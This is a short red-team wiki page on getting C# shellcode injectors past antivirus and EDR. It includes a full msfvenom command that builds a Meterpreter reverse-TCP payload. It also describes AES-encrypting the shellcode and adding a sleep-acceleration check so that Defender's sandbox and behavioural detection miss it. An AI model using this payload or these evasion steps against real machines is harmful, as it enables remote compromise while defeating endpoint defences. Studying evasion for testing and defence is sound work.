search

Evasion and bypassing detection within C#

hashtag
Overview

AV and EDR bypass techniques for C# assembly payloads.

hashtag
Experiment

In this experiment we will be using the NTAPI injector as our baseline.

Using NTAPI Undocumented Functionschevron-right

hashtag
Msfvenom payload

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f raw EXITFUNC=thread -o shellcode.bin

hashtag
Injector without any shellcode

For our baseline we tested the raw injector code without any shellcode in the payload.

hashtag
Raw Meterpreter payload shellcode

Running injector with raw Meterpreter shellcode.

hashtag
Using AES encryption

Encrypting the shellcode using AES

Aes encryptorchevron-right

hashtag
Runner it twice and defender is not so nice

So interesting, when executing it a second time Defenders behavioral analysis flagged and blocked execution.

Adding a sleep accelerator check to bypass sandboxing seems to do the trick to bypass this a second time.

Time accelerated checkschevron-right

hashtag
References

C# .Net Assemblychevron-right
PreviousAnti-virus evasionNextEncryptors

Last updated